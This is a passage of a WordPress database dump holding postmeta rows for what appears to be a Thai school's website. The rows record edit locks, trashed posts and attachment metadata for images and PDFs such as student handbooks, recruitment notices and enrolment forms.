(30715, 12813, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:18:\"2022/04/ชย.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"ชย-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"ชย-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"ชย-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"ชย-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"ชย-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30718, 12812, '_hide_featured', NULL),
(30721, 12816, '_edit_lock', '1649730884:12'),
(30722, 12816, '_edit_last', '12'),
(30723, 12816, '_hide_featured', NULL),
(30724, 12786, '_wp_trash_meta_status', 'draft'),
(30725, 12786, '_wp_trash_meta_time', '1649731098'),
(30726, 12786, '_wp_desired_post_slug', ''),
(30727, 12816, '_wp_trash_meta_status', 'publish'),
(30728, 12816, '_wp_trash_meta_time', '1649731110'),
(30729, 12816, '_wp_desired_post_slug', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-8-%e0%b9%80%e0%b8%a1%e0%b8%a9%e0%b8%b2%e0%b8%a2%e0%b8%99-2565-%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%84'),
(30730, 12812, '_wp_trash_meta_status', 'publish'),
(30731, 12812, '_wp_trash_meta_time', '1649731405'),
(30732, 12812, '_wp_desired_post_slug', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-8-%e0%b9%80%e0%b8%a1%e0%b8%a9%e0%b8%b2%e0%b8%a2%e0%b8%99-2565-%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%84'),
(30733, 12821, '_edit_lock', '1649731618:12'),
(30734, 12821, '_edit_last', '12'),
(30735, 12821, '_thumbnail_id', '12813'),
(30738, 12821, '_hide_featured', NULL),
(30741, 12823, '_edit_lock', '1651051764:14'),
(30742, 12823, '_edit_last', '12'),
(30743, 12824, '_wp_attached_file', '2022/04/รับประกาศ.jpg'),
(30744, 12824, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1140;s:6:\"height\";i:760;s:4:\"file\";s:39:\"2022/04/รับประกาศ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"รับประกาศ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"รับประกาศ-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"รับประกาศ-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"รับประกาศ-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"รับประกาศ-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30745, 12823, '_thumbnail_id', '12824'),
(30748, 12823, '_hide_featured', NULL),
(30751, 12826, '_edit_lock', '1649736665:12'),
(30752, 12826, '_edit_last', '12'),
(30753, 12827, '_wp_attached_file', '2022/04/ฟรอย.jpg'),
(30754, 12827, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1862;s:6:\"height\";i:1074;s:4:\"file\";s:24:\"2022/04/ฟรอย.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"ฟรอย-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"ฟรอย-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"ฟรอย-768x443.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:443;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"ฟรอย-1024x591.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:591;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"ฟรอย-400x231.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30755, 12826, '_thumbnail_id', '12827'),
(30758, 12826, '_hide_featured', NULL),
(30763, 12829, '_edit_lock', '1649737939:12'),
(30764, 12829, '_edit_last', '12'),
(30765, 12830, '_wp_attached_file', '2022/04/คู่มือ-นักเรียน-นักศึกษาปีการศึกษา-2565.pdf'),
(30766, 12831, '_wp_attached_file', '2022/04/คู่มือ-นักเรียน-นักศึกษาปีการศึกษา-2565-1.pdf'),
(30767, 12829, '_hide_featured', NULL),
(30768, 12829, '_wp_trash_meta_status', 'publish'),
(30769, 12829, '_wp_trash_meta_time', '1649738090'),
(30770, 12829, '_wp_desired_post_slug', '%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2'),
(30771, 12833, '_edit_lock', '1649738275:12'),
(30772, 12833, '_edit_last', '12'),
(30773, 12833, '_hide_featured', NULL),
(30775, 12836, '_edit_lock', '1649738272:12'),
(30776, 12836, '_edit_last', '12'),
(30777, 12837, '_wp_attached_file', '2022/04/คู่มือ-นักเรียน-นักศึกษาปีการศึกษา-2565-2.pdf'),
(30780, 12836, '_hide_featured', NULL),
(30783, 12840, '_edit_lock', '1650247313:14'),
(30784, 12840, '_edit_last', '14'),
(30785, 12841, '_wp_attached_file', '2022/04/รับสมัครเจ้าหน้าที่-งานสารบรรณ-งานโครงการ.pdf'),
(30788, 12840, '_hide_featured', NULL),
(30793, 12843, '_edit_lock', '1650355203:14'),
(30794, 12843, '_edit_last', '14'),
(30795, 12844, '_wp_attached_file', '2022/04/รับสมัครครูพิเศษ-ชย-คณิต-บัญชี.pdf'),
(30798, 12843, '_hide_featured', NULL),
(30801, 12846, '_wp_attached_file', '2022/04/รับสมัครครูพิเศษสอน-บัญชี-คณิต-ชย-แก้ไข.pdf'),
(30806, 12848, '_wp_attached_file', '2022/04/รับสมัครครู-ชย-ชอ-คณิต-บัญชี-แก้ไข2.pdf'),
(30811, 12851, '_wp_attached_file', '2021/12/1-1.jpg'),
(30812, 12851, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/1-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"1-1-300x86.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-1-768x220.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-1-1024x293.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-1-400x114.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30813, 12852, '_wp_attached_file', '2021/12/2-2.png'),
(30814, 12852, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/2-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"2-2-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-2-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-2-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-2-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30815, 12853, '_wp_attached_file', '2021/12/3-1.png'),
(30816, 12853, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/3-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"3-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"3-1-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"3-1-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"3-1-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"3-1-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30817, 12854, '_wp_attached_file', '2021/12/4-2.png'),
(30818, 12854, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/4-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"4-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"4-2-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"4-2-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"4-2-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"4-2-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30819, 12855, '_edit_lock', '1650357107:14'),
(30820, 12855, '_edit_last', '14'),
(30821, 12856, '_wp_attached_file', '2022/04/ตัวอย่างเอกสารมอบตัว.pdf'),
(30824, 12855, '_hide_featured', NULL),
(30827, 12859, '_edit_lock', '1650357246:14'),
(30828, 12859, '_edit_last', '14'),
(30829, 12861, '_wp_attached_file', '2022/04/เอกสารการมอบตัวนักเรียน-นักศึกษา-เพิ่มเติ.pdf'),
(30832, 12859, '_hide_featured', NULL),
(30835, 12868, '_edit_lock', '1650357726:14'),
(30836, 12868, '_edit_last', '14'),
(30839, 12868, '_hide_featured', NULL),
(30842, 12870, '_wp_attached_file', '2021/12/2-3.png'),
(30843, 12870, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/2-3.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"2-3-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-3-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-3-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-3-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30844, 12871, '_wp_attached_file', '2021/12/2-4.png'),
(30845, 12871, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/2-4.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"2-4-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-4-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-4-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-4-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30846, 12875, '_wp_attached_file', '2021/12/1-2.jpg'),
(30847, 12875, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/1-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"1-2-300x86.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-2-768x220.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-2-1024x293.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-2-400x114.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30848, 12876, '_wp_attached_file', '2021/12/1-3.png'),
(30849, 12876, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/1-3.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"1-3-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-3-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-3-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-3-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30850, 12877, '_wp_attached_file', '2021/12/4-3.png'),
(30851, 12877, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/4-3.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"4-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"4-3-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"4-3-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"4-3-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"4-3-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30852, 12879, '_edit_lock', '1650417220:14'),
(30853, 12879, '_edit_last', '14'),
(30854, 12880, '_wp_attached_file', '2022/04/ประกาศพ้นสภาพเนื่องจากผลการเรียนเฉลี่ยไ.pdf'),
(30857, 12879, '_hide_featured', NULL),
(30864, 12882, '_edit_lock', '1650858181:14'),
(30865, 12882, '_edit_last', '14'),
(30868, 12882, '_hide_featured', NULL),
(30871, 12887, '_edit_lock', '1650461604:12'),
(30872, 12887, '_edit_last', '12'),
(30873, 12888, '_wp_attached_file', '2022/04/279006729_400834942045392_2761712266476251683_n.jpg'),
(30874, 12888, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1317;s:6:\"height\";i:1861;s:4:\"file\";s:59:\"2022/04/279006729_400834942045392_2761712266476251683_n.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"279006729_400834942045392_2761712266476251683_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"279006729_400834942045392_2761712266476251683_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"279006729_400834942045392_2761712266476251683_n-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"279006729_400834942045392_2761712266476251683_n-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"279006729_400834942045392_2761712266476251683_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30875, 12887, '_hide_featured', NULL),
(30876, 12887, '_thumbnail_id', '12888'),
(30885, 12891, '_edit_lock', '1650462089:12'),
(30886, 12891, '_edit_last', '12'),
(30887, 12892, '_wp_attached_file', '2022/04/ลงทะเบียน.png'),
(30888, 12892, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1439;s:6:\"height\";i:785;s:4:\"file\";s:39:\"2022/04/ลงทะเบียน.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"ลงทะเบียน-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"ลงทะเบียน-300x164.png\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"ลงทะเบียน-768x419.png\";s:5:\"width\";i:768;s:6:\"height\";i:419;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"ลงทะเบียน-1024x559.png\";s:5:\"width\";i:1024;s:6:\"height\";i:559;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"ลงทะเบียน-400x218.png\";s:5:\"width\";i:400;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
